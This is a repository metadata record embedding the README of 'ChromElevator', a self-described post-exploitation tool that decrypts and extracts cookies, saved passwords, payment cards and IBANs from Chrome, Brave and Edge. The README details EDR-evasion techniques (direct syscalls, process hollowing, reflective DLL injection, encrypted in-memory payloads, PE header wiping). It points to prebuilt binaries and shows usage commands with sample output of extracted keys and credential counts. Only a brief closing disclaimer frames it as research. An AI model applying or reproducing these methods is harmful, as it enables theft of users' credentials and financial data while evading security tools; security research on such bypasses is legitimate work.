{"id":18886512,"url":"https://github.com/xaitax/chrome-app-bound-encryption-decryption","last_synced_at":"2025-12-25T00:21:22.029Z","repository":{"id":259709412,"uuid":"879235382","full_name":"xaitax/Chrome-App-Bound-Encryption-Decryption","owner":"xaitax","description":"Decrypt App-Bound encrypted keys in Chrome 127+, using the IElevator COM interface bypassing path validation and encryption protections.","archived":false,"fork":false,"pushed_at":"2025-05-06T19:53:41.000Z","size":2518,"stargazers_count":440,"open_issues_count":9,"forks_count":78,"subscribers_count":8,"default_branch":"main","last_synced_at":"2025-05-06T20:39:55.882Z","etag":null,"topics":["app-bound","brave","chrome","chromium","dll-injection","edge","ielevator"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/xaitax.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2024-10-27T11:28:35.000Z","updated_at":"2025-05-06T19:53:46.000Z","dependencies_parsed_at":"2024-12-18T00:01:06.944Z","dependency_job_id":"182c95bd-1e69-4d3a-b635-d784c67b41d0","html_url":"https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","commit_stats":{"total_commits":3,"total_committers":1,"mean_commits":3.0,"dds":0.0,"last_synced_commit":"f67cfc4925929503ca5623ed150604ac8f58a52a"},"previous_names":["xaitax/chrome-app-bound-encryption-decryption"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/xaitax%2FChrome-App-Bound-Encryption-Decrypti
on","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/xaitax%2FChrome-App-Bound-Encryption-Decryption/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/xaitax%2FChrome-App-Bound-Encryption-Decryption/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/xaitax%2FChrome-App-Bound-Encryption-Decryption/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/xaitax","download_url":"https://codeload.github.com/xaitax/Chrome-App-Bound-Encryption-Decryption/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254518384,"owners_count":22084374,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["app-bound","brave","chrome","chromium","dll-injection","edge","ielevator"],"created_at":"2024-11-08T07:28:04.059Z","updated_at":"2025-12-25T00:21:22.018Z","avatar_url":"https://github.com/xaitax.png","language":"C","funding_links":["https://ko-fi.com/M4M61EP5XL"],"categories":[],"sub_categories":[],"readme":"# ChromElevator \u003csup\u003e\u003csub\u003e\u003csup\u003e(`Chrome App-Bound Encryption Decryption`)\n\n## 🚀 Overview\n\n![Build Status](https://img.shields.io/badge/build-passing-brightgreen)\n![License](https://img.shields.io/badge/license-MIT-blue)\n![Platform](https://img.shields.io/badge/platform-Windows%20x64%20%7C%20ARM64-lightgrey)\n![Languages](https://img.shields.io/badge/code-C%2B%2B%20%7C%20ASM-9cf)\n[![Ask 
DeepWiki](https://deepwiki.com/badge.svg)](https://deepwiki.com/xaitax/Chrome-App-Bound-Encryption-Decryption)\n\nA post-exploitation tool demonstrating a complete, in-memory bypass of Chromium's **App-Bound Encryption (ABE)**. This project utilizes **Direct Syscall-based Reflective Process Hollowing** to launch a legitimate browser process in a suspended state, stealthily injecting a payload to hijack its identity and security context. This **Living-off-the-Land (LOTL)** technique subverts the browser's own security model. The fileless approach allows the tool to operate entirely from memory, bypassing user-land API hooks to decrypt and exfiltrate sensitive user data (cookies, passwords, payments) from modern Chromium browsers.\n\nIf you find this research valuable, I'd appreciate a coffee:  \n[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/M4M61EP5XL)\n\n## 🛡️ Core Technical Pillars\n\nThis tool's effectiveness is rooted in a combination of modern, evasion-focused techniques:\n\n- **Direct Syscalls for Evasion:** Bypasses EDR/AV user-land hooks on standard WinAPI functions by invoking kernel functions directly. The engine dynamically resolves syscall numbers at runtime using **Hell's Gate** technique with **hash-based function matching** (no plaintext syscall names in the binary).\n\n- **Direct Syscall-Based Process Hollowing:** A stealthy process creation and injection technique. Instead of injecting into a high-traffic, potentially monitored process, it creates a new, suspended host process. This significantly reduces the chances of detection, as all memory manipulations occur before the process begins normal execution.\n\n- **Fileless In-Memory Payload:** The payload DLL never touches the disk on the target machine. 
It is stored encrypted within the injector using **ChaCha20** with **compile-time derived keys**, decrypted in-memory, and reflectively loaded, minimizing its forensic footprint and bypassing static file-based scanners.\n\n- **Reflective DLL Injection (RDI):** A stealthy process injection method that circumvents `LoadLibrary`, thereby evading detection mechanisms that monitor module loads. The self-contained C loader resolves all of its own dependencies from memory.\n\n- **Target-Context COM Invocation:** The lynchpin for defeating App-Bound Encryption. By executing code _within_ the trusted browser process, we inherit its identity and security context, allowing us to make legitimate-appearing calls to the ABE COM server and satisfy its path-validation security checks.\n\n## ⚙️ Features\n\n### Core Functionality\n\n- 🔓 Full user-mode decryption of cookies, passwords, payment methods, and IBANs.\n- 📁 Discovers and processes all user profiles (Default, Profile 1, etc.).\n- 📝 Exports all extracted data into structured JSON files, organized by profile.\n- 🔍 Comprehensive browser fingerprinting with system information.\n\n### Stealth \u0026 Evasion\n\n- 🛡️ **Fileless Payload Delivery:** In-memory decryption and injection of an encrypted resource.\n- 🛡️ **Direct Syscall Engine:** Bypasses common endpoint defenses by avoiding hooked user-land APIs for all process operations.\n- 🛡️ **Hash-Based Syscall Resolution:** No plaintext `Nt*`/`Zw*` function names in binary—uses compile-time DJB2 hashes.\n- 🛡️ **Compile-Time Key Derivation:** Encryption keys derived from build metadata, unique per build.\n- 🛡️ **PE Header Destruction:** Post-injection PE headers obliterated with pseudo-random data to evade memory scanners.\n- 🛡️ **IPC Mimicry:** Browser-specific named pipe patterns that blend with legitimate browser IPC traffic.\n- 🤫 **Process Hollowing:** Creates a benign, suspended host process for the payload, avoiding injection into potentially monitored processes.\n- 👻 
**Reflective DLL Injection:** Stealthily loads the payload without suspicious `LoadLibrary` calls.\n- 🔒 **Proactive File-Lock Mitigation:** Automatically terminates browser utility processes that hold locks on target database files.\n- 💼 **No Admin Privileges Required:** Operates entirely within the user's security context.\n\n### Compatibility \u0026 Usability\n\n- 🌐 Works on **Google Chrome**, **Brave**, \u0026 **Edge**.\n- 💻 Natively supports **x64** and **ARM64** architectures.\n- 🚀 **Standalone Operation:** Automatically creates a new browser process to host the payload, requiring no pre-existing running instances.\n- 📁 Customizable output directory for extracted data.\n\n\u003cimg width=\"2142\" height=\"1720\" alt=\"image\" src=\"https://github.com/user-attachments/assets/7780fa3c-730b-493a-b5f7-b202c7a59420\" /\u003e\n\n\n## 📦 Supported \u0026 Tested Versions\n\n| Browser            | Tested Version (x64 \u0026 ARM64) |\n| ------------------ | ---------------------------- |\n| **Google Chrome**  | 143.0.7499.170               |\n| **Brave**          | 1.85.118 (143.0.7499.169)    |\n| **Microsoft Edge** | 144.0.3719.35                |\n\n## 🔍 Feature Support Matrix\n\nThis matrix outlines the extraction capabilities for each supported browser.\n\n| Feature              | Google Chrome          | Brave                  | Microsoft Edge                          |\n|----------------------|------------------------|------------------------|-----------------------------------------|\n| **Cookies**         | ✅ ABE                | ✅ ABE                | ✅ ABE                                 |\n| **Passwords**       | ✅ ABE                | ✅ ABE                | ✅ ABE                                 |\n| **Payment Methods** | ✅ ABE                | ✅ ABE                | ✅ ABE                                 |\n| **IBANs**           | ✅ ABE                | ✅ ABE                | ❌ Not existing                        |\n\n**Encryption Method Notes:**\n- **ABE 
(App-Bound Encryption):** Using AES-256-GCM with browser-specific master keys decrypted via COM interfaces.\n- **DPAPI v10:** Legacy Windows Data Protection API encryption. Microsoft Edge has not yet transitioned passwords to ABE, so older DPAPI-based decryption methods are still required and functional.\n- Cookies \u0026 payments use ABE across all browsers. IBANs are not supported in Microsoft Edge.\n\n## 🔬 Technical Workflow\n\nThe tool's execution is focused on stealth and efficiency, built around a **Direct Syscall-based Reflective Hollowing** process. This approach ensures that few high-level API calls are made and that the payload operates from within a legitimate, newly created browser process.\n\n### **Stage 1: The Injector (`chromelevator.exe`)**\n\n1.  **Pre-Flight \u0026 Initialization:** The injector begins by initializing its **direct syscall engine**, dynamically parsing `ntdll.dll` to resolve syscall numbers (SSNs) using hash-based matching and locate kernel transition gadgets (`syscall/ret` or `svc/ret`). It then performs a critical pre-flight check, using `NtGetNextProcess` and other syscalls to find and terminate any browser \"network service\" child processes. This preemptively releases file locks on the target SQLite databases.\n2.  **Payload Preparation:** The core payload DLL, which is stored as a **ChaCha20-encrypted resource** with compile-time derived keys, is loaded and decrypted entirely in-memory.\n3.  **Process Hollowing:** Instead of targeting an existing process, the injector creates a new instance of the target browser in a **`CREATE_SUSPENDED`** state (`CreateProcessW`). This pristine, suspended process serves as the host for our payload.\n4.  
**Reflective Injection via Syscalls:** Using the direct syscall engine, the injector performs a series of stealthy actions on the suspended process:\n    - It allocates memory using `NtAllocateVirtualMemory` (direct syscall).\n    - It writes the decrypted payload DLL into the allocated space with `NtWriteVirtualMemory`.\n    - It changes the memory region's permissions to executable using `NtProtectVirtualMemory` (direct syscall).\n    - It creates a **named pipe** for communication and writes the pipe's name into the target's memory.\n5.  **Execution \u0026 Control:** A new thread is created in the target process using `NtCreateThreadEx`. The thread's start address points directly to the payload's `Bootstrap` export, with the address of the remote pipe name as its argument. The original main thread of the browser remains suspended and is never resumed. The injector then waits for the payload to connect back to the pipe.\n\n### **Stage 2: The Injected Payload (In-Memory)**\n\n1.  **Bootstrapping:** The `Bootstrap` reflective loader executes, functioning as a custom in-memory PE loader with enhanced stealth:\n    - Allocates new memory for the payload using **direct syscalls** to `NtAllocateVirtualMemory` (bypassing hooked `VirtualAlloc`).\n    - Correctly maps the DLL's sections and performs base relocations.\n    - Resolves its Import Address Table (IAT) by parsing the PEB and hashing function names.\n    - Sets section permissions using **direct syscalls** to `NtProtectVirtualMemory`.\n    - **Destroys PE headers** by overwriting the DOS/NT headers with pseudo-random data, eliminating the MZ signature from memory.\n    - Finally, invokes the payload's `DllMain`.\n2.  **Connection \u0026 Setup:** The `DllMain` spawns a new thread that immediately connects to the named pipe handle passed by the injector. It reads the configuration, including the output path, sent by the injector. All subsequent logs and status updates are relayed back through this pipe.\n3.  
**Target-Context COM Hijack:** Now running natively within the browser process, the payload instantiates the browser's internal `IOriginalBaseElevator` or `IEdgeElevatorFinal` COM server. As the call originates from a trusted process path, all of the server's security checks are passed.\n4.  **Master Key Decryption:** The payload calls the `DecryptData` method on the COM interface, providing the `app_bound_encrypted_key` it reads from the `Local State` file. The COM server dutifully decrypts the key and returns the plaintext AES-256 master key to the payload.\n5.  **Data Exfiltration:** Armed with the AES key, the payload enumerates all user profiles (`Default`, `Profile 1`, etc.). For each profile, it queries the relevant SQLite databases (`Cookies`, `Login Data`, `Web Data`), decrypts the data blobs using AES-256-GCM, and formats the secrets as JSON. The results are written directly to the output directory specified by the injector.\n6.  **Shutdown:** After processing all profiles, the payload sends a completion signal to the injector over the pipe and calls `FreeLibraryAndExitThread` to clean up. The injector, upon receiving the signal, terminates the parent host process with `NtTerminateProcess`.\n\n## 🔧 Build Instructions\n\nThis project uses a simple, robust build script that handles all compilation and resource embedding automatically.\n\n1. **Clone** this repository.\n\n2. Open a **Developer Command Prompt for VS** (or any MSVC‑enabled shell).\n\n3. 
Run the build script `make.bat` from the project root.\n\n**Build Options:**\n- `make.bat` - Full build (default)\n- `make.bat clean` - Remove all build artifacts\n- `make.bat build_encryptor_only` - Build only the encryptor (used by CI)\n- `make.bat build_target_only` - Build payload and injector (used by CI)\n\n### Automated Builds with GitHub Actions\n\nThis project uses GitHub Actions to automatically build the injector executable (`chromelevator.exe`) for both **x64** and **ARM64** architectures.\n\nYou can find the latest pre-compiled binaries on the [**Releases page**](https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption/releases). The executables for both architectures are packaged together in a single, convenient .zip file.\n\n**Release Package Contents:**\n\n- `chromelevator_x64.exe`\n- `chromelevator_arm64.exe`\n\n## 🚀 Usage\n\n```bash\nPS\u003e .\\chromelevator.exe --help\n\n_________ .__                         ___________.__                       __\n\\_   ___ \\|  |_________  ____   _____ \\_   _____/|  |   _______  _______ _/  |_  ___________\n/    \\  \\/|  |  \\_  __ \\/  _ \\ /     \\ |    __)_ |  | _/ __ \\  \\/ /\\__  \\\\   __\\/  _ \\_  __ \\\n\\     \\___|   Y  \\  | \\(  \u003c_\u003e )  Y Y  \\|        \\|  |_\\  ___/\\   /  / __ \\|  | (  \u003c_\u003e )  | \\/\n \\______  /___|  /__|   \\____/|__|_|  /_______  /|____/\\___  \u003e\\_/  (____  /__|  \\____/|__|\n        \\/     \\/                   \\/        \\/           \\/           \\/\n Direct Syscall-Based Reflective Hollowing\n x64 \u0026 ARM64 | v0.17.0 by @xaitax\n\n  Usage: chromelevator.exe [options] \u003cchrome|edge|brave|all\u003e\n\n  Options:\n    -v, --verbose      Show detailed output\n    -f, --fingerprint  Extract browser fingerprint\n    -o, --output-path  Custom output directory\n```\n\n### Options\n\n- `--output-path \u003cpath\u003e` or `-o \u003cpath\u003e`\n  Specifies the base directory for output files.\n  Defaults to `.\\output\\` relative to the 
injector's location.\n  Data will be organized into subfolders: `\u003cpath\u003e/\u003cBrowserName\u003e/\u003cProfileName\u003e/`.\n\n- `--verbose` or `-v`\n  Enable extensive debugging output from the injector.\n\n- `--fingerprint` or `-f`\n  Extract comprehensive browser fingerprinting data including version, extensions, security settings, and system information.\n  Results saved to `fingerprint.json` in the browser's output directory.\n\n- `--help` or `-h`\n  Show this help message.\n\n### Normal Run\n\n```bash\nPS\u003e .\\chromelevator.exe all\n_________ .__                         ___________.__                       __\n\\_   ___ \\|  |_________  ____   _____ \\_   _____/|  |   _______  _______ _/  |_  ___________\n/    \\  \\/|  |  \\_  __ \\/  _ \\ /     \\ |    __)_ |  | _/ __ \\  \\/ /\\__  \\\\   __\\/  _ \\_  __ \\\n\\     \\___|   Y  \\  | \\(  \u003c_\u003e )  Y Y  \\|        \\|  |_\\  ___/\\   /  / __ \\|  | (  \u003c_\u003e )  | \\/\n \\______  /___|  /__|   \\____/|__|_|  /_______  /|____/\\___  \u003e\\_/  (____  /__|  \\____/|__|\n        \\/     \\/                   \\/        \\/           \\/           \\/\n Direct Syscall-Based Reflective Hollowing\n x64 \u0026 ARM64 | v0.17.0 by @xaitax\n\n  ┌──── Brave ──────────────────────────────────────\n  │\n  │ Decryption Key\n  │ 2522A3C1730EA8EE84BAAD1994DB31E20437D9DCF27628997598BB5B86F73DCD\n  │\n  ├── Default\n  │   Cookies     2446/2467\n  │   Passwords   46\n  │   Cards       1\n  │   IBANs       1\n  │\n  └── 2446 cookies, 46 passwords, 1 cards, 1 IBANs (1 profile)\n      C:\\Users\\ah\\Documents\\GitHub\\Chrome-App-Bound-Encryption-Decryption\\output\\Brave\n\n  ┌──── Chrome ──────────────────────────────────────\n  │\n  │ Decryption Key\n  │ 3FA14DC988A34C85BDB872159B739634CB7E56F8E34449C1494297B9B629D094\n  │\n  ├── Default\n  │   Cookies     378/382\n  │   Passwords   1\n  │\n  ├── Profile 1\n  │   Cookies     768/773\n  │   Passwords   2\n  │   Cards       1\n  │   IBANs       1\n  
│\n  └── 1146 cookies, 3 passwords, 1 cards, 1 IBANs (2 profiles)\n      C:\\Users\\ah\\Documents\\GitHub\\Chrome-App-Bound-Encryption-Decryption\\output\\Chrome\n\n  ┌──── Edge ──────────────────────────────────────\n  │\n  │ Decryption Key\n  │ B0334FAD7F5805362CB4C44B144A95AB7A68F7346EF99EB3F175F09DB08C8FD9\n  │\n  ├── Default\n  │   Cookies     220/222\n  │   Passwords   2\n  │   Cards       1\n  │\n  ├── Profile 1\n  │   Cookies     42\n  │\n  └── 262 cookies, 2 passwords, 1 cards (2 profiles)\n      C:\\Users\\ah\\Documents\\GitHub\\Chrome-App-Bound-Encryption-Decryption\\output\\Edge\n```\n\n### Verbose\n\n```bash\nPS\u003e .\\chromelevator.exe -v -f chrome\n\n_________ .__                         ___________.__                       __\n\\_   ___ \\|  |_________  ____   _____ \\_   _____/|  |   _______  _______ _/  |_  ___________\n/    \\  \\/|  |  \\_  __ \\/  _ \\ /     \\ |    __)_ |  | _/ __ \\  \\/ /\\__  \\\\   __\\/  _ \\_  __ \\\n\\     \\___|   Y  \\  | \\(  \u003c_\u003e )  Y Y  \\|        \\|  |_\\  ___/\\   /  / __ \\|  | (  \u003c_\u003e )  | \\/\n \\______  /___|  /__|   \\____/|__|_|  /_______  /|____/\\___  \u003e\\_/  (____  /__|  \\____/|__|\n        \\/     \\/                   \\/        \\/           \\/           \\/\n Direct Syscall-Based Reflective Hollowing\n x64 \u0026 ARM64 | v0.17.0 by @xaitax\n\n  ┌──── Chrome ──────────────────────────────────────\n  │ Terminating browser network services...\n  │   [+] Network services terminated\n  │ Creating suspended process: C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\n  │   [+] Process created (PID: 25184)\n  │   [+] IPC pipe established: \\\\.\\pipe\\chrome.nacl.20027_76C4\n  │ Deriving runtime decryption keys...\n  │   [+] Payload decrypted (1044 KB)\n  │   [+] Bootstrap entry point resolved (offset: 0x2a690)\n  │ Allocating memory in target process via syscall...\n  │   [+] Memory allocated at 0x1c2dec60000 (1048 KB)\n  │   [+] Payload + parameters written\n  │   [+] 
Memory protection set to PAGE_EXECUTE_READ\n  │ Creating remote thread via syscall...\n  │   [+] Thread created (entry: 0x1c2dec8a690)\n  │ Awaiting payload connection...\n  │   [+] Payload connected\n  │ Running in Chrome\n  │\n  │ Decryption Key\n  │ 3FA14DC988A34C85BDB872159B739634CB7E56F8E34449C1494297B9B629D094\n  │\n  ├── Default\n  │   Size        13 MB\n  │   Cookies     378/382\n  │   Passwords   1\n  │\n  ├── Profile 1\n  │   Size        610 MB\n  │   Cookies     768/773\n  │   Passwords   2\n  │   Cards       1\n  │   IBANs       1\n  │ Extracting comprehensive fingerprint...\n  │ Fingerprint saved to fingerprint.json\n  │\n  └── 1146 cookies, 3 passwords, 1 cards, 1 IBANs (2 profiles)\n      C:\\Users\\ah\\Documents\\GitHub\\Chrome-App-Bound-Encryption-Decryption\\output\\Chrome\n```\n\n## 📂 Data Extraction\n\nOnce decryption completes, data is saved to the specified output path (defaulting to `.\\output\\` if not specified via `--output-path`). Files are organized as follows:\n\n**Base Path:** `YOUR_CHOSEN_PATH` (e.g., `.\\output\\` or the path you provide)\n**Structure:** \u003cBase Path\u003e/\u003cBrowserName\u003e/\u003cProfileName\u003e/\u003cdata_type\u003e.json\n\nExample paths (assuming default output location):\n\n- 🍪 **Cookies (Chrome Default profile):** .\\output\\Chrome\\Default\\cookies.json\n- 🔑 **Passwords (Edge Profile 1):** .\\output\\Edge\\Profile 1\\passwords.json\n- 💳 **Payment Methods (Brave Default profile):** .\\output\\Brave\\Default\\payments.json\n- 🏦 **IBANs (Chrome Profile 1):** .\\output\\Chrome\\Profile 1\\iban.json\n\n### 🍪 Cookie Extraction\n\nEach cookie file is a JSON array of objects:\n\n```json\n[\n  {\n    \"host\": \"accounts.google.com\",\n    \"name\": \"ACCOUNT_CHOOSER\",\n    \"value\": \"AFx_qI781-…\"\n  },\n  {\n    \"host\": \"mail.google.com\",\n    \"name\": \"OSID\",\n    \"value\": \"g.a000uwj5ufIS…\"\n  },\n  …\n]\n```\n\n### 🔑 Password Extraction\n\nEach password file is a JSON array of 
objects:\n\n```json\n[\n  {\n    \"url\": \"https://example.com/login\",\n    \"user\": \"user@example.com\",\n    \"pass\": \"••••••••••\"\n  },\n  …\n]\n```\n\n### 💳 Payment Method Extraction\n\nEach payment file is a JSON array of objects:\n\n```json\n[\n  {\n    \"name\": \"John Doe\",\n    \"month\": 12,\n    \"year\": 2030,\n    \"number\": \"••••••••••1234\",\n    \"cvc\": \"•••\"\n  },\n  …\n]\n```\n\n### 🏦 IBAN Extraction\n\nEach IBAN file is a JSON array of objects:\n\n```json\n[\n  {\n    \"nickname\": \"UK Test\",\n    \"iban\": \"GB33BUKB20201555555555\"\n  }\n]\n```\n\n### 🔍 Browser Fingerprinting \n\nWhen using the `--fingerprint` or `-f` flag, a comprehensive metadata report is generated:\n\n```json\n{\n  \"browser\": \"Chrome\",\n  \"executable_path\": \"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n  \"browser_version\": \"143.0.7499.170\",\n  \"user_data_path\": \"C:\\\\Users\\\\username\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\",\n  \"sync_enabled\": false,\n  \"enterprise_managed\": true,\n  \"update_channel\": \"stable\",\n  \"hardware_acceleration\": false,\n  \"metrics_enabled\": false,\n  \"autofill_enabled\": true,\n  \"password_manager_enabled\": false,\n  \"safe_browsing_enabled\": true,\n  \"do_not_track\": false,\n  \"third_party_cookies_blocked\": false,\n  \"translate_enabled\": true,\n  \"installed_extensions_count\": 2,\n  \"extension_ids\": [\"ghbmnnjooekpmoecnnnilnnbdlolhkhi\", \"nmmhkkegccagdldgiimedpiccmgmieda\"],\n  \"profile_count\": 2,\n  \"computer_name\": \"DESKTOP-ABC123\",\n  \"windows_user\": \"username\",\n  \"os_version\": \"10.0.26220\",\n  \"architecture\": \"ARM64\",\n  \"last_config_update\": 1766578854,\n  \"extraction_timestamp\": 1766591611,\n  \"extraction_complete\": true\n}\n```\n\nThis data provides intelligence about the browser's configuration, security posture, and system context.\n\n## 📚 In-Depth Technical Analysis \u0026 Research\n\nFor a comprehensive 
understanding of Chrome's App-Bound Encryption, the intricacies of its implementation, the detailed mechanics of this tool's approach, and a broader discussion of related security vectors, please refer to my detailed research paper:\n\n1.  ➡️ **[Chrome App-Bound Encryption (ABE) - Technical Deep Dive \u0026 Research Notes](docs/RESEARCH.md)**\n\n    This document covers:\n\n    - The evolution from DPAPI to ABE.\n    - A step-by-step breakdown of the ABE mechanism, including `IElevator` COM interactions and key wrapping.\n    - Detailed methodology of the DLL injection strategy used by this tool.\n    - Analysis of encrypted data structures and relevant Chromium source code insights.\n    - Discussion of alternative decryption vectors and Chrome's evolving defenses.\n\n2.  ➡️ **[The Curious Case of the Cantankerous COM: Decrypting Microsoft Edge's App-Bound Encryption](docs/The_Curious_Case_of_the_Cantankerous_COM_Decrypting_Microsoft_Edge_ABE.md)**\n\n    This article details the specific challenges and reverse engineering journey undertaken to achieve reliable ABE decryption for Microsoft Edge. It includes:\n\n    - An account of the initial issues and misleading error codes (`E_INVALIDARG`, `E_NOINTERFACE`).\n    - The process of using COM type library introspection (with Python `comtypes`) to uncover Edge's unique `IElevatorEdge` vtable structure and inheritance.\n    - How this insight led to tailored C++ interface stubs for successful interaction with Edge's ABE service.\n    - A practical look at debugging tricky COM interoperability issues.\n\n3.  
➡️ **[COMrade ABE: Your Field Manual for App-Bound Encryption's COM Underbelly](docs/COMrade_ABE_Field_Manual.md)**\n\n    This field manual introduces **COMrade ABE**, a Python-based dynamic analyzer for ABE COM interfaces, and dives into its practical applications:\n\n    - Explains the necessity for dynamic COM interface analysis due to browser variations and updates.\n    - Details COMrade ABE's methodology: registry scanning for service discovery, Type Library loading and parsing, and heuristic-based ABE method signature matching.\n    - Provides a comprehensive guide to interpreting COMrade ABE's output, including CLSIDs, IIDs (standard and C++ style), and the significance of verbose output details like VTable offsets, defining interfaces, and full inheritance chains.\n    - Highlights the utility of the auto-generated C++ stubs (`--output-cpp-stub`) for rapid development and research.\n    - Discusses how COMrade ABE aids in adapting to ABE changes, analyzing new Chromium browsers, and understanding vendor-specific COM customizations.\n\n## 🔗 Additional Resources \u0026 Research\n\nThis project builds upon the work and analysis of the wider security community.\n\n- **Official Documentation \u0026 Announcements:**\n\n  - [Google Security Blog: Improving the security of Chrome cookies on Windows](https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html)\n  - [Design Doc: Chrome app-bound encryption Service](https://drive.google.com/file/d/1xMXmA0UJifXoTHjHWtVir2rb94OsxXAI/view)\n\n- **Community Research \u0026 Acknowledgment:**\n  - Proof of concept by [snovvcrash](https://gist.github.com/snovvcrash/caded55a318bbefcb6cc9ee30e82f824)\n\n## 🗒️ Changelog\n\nAll notable changes to this project are documented in the [**CHANGELOG**](CHANGELOG.md) file. 
This includes version history, new features, bug fixes, and security improvements.\n\n## 📜 License\n\nThis project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.\n\n## 💡 Project Philosophy \u0026 Disclaimer\n\n\u003e [!IMPORTANT]\n\u003e This is a hobby project created for educational and security research purposes. It serves as a personal learning experience and a playing field for exploring advanced Windows concepts.\n\u003e\n\u003e **This tool is NOT intended to be a fully-featured infostealer or a guaranteed EDR evasion tool.** While it employs advanced techniques, its primary goal is to demonstrate and dissect the ABE mechanism, not to provide operational stealth for malicious use. Please ensure compliance with all relevant legal and ethical guidelines.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fxaitax%2Fchrome-app-bound-encryption-decryption","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fxaitax%2Fchrome-app-bound-encryption-decryption","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fxaitax%2Fchrome-app-bound-encryption-decryption/lists"}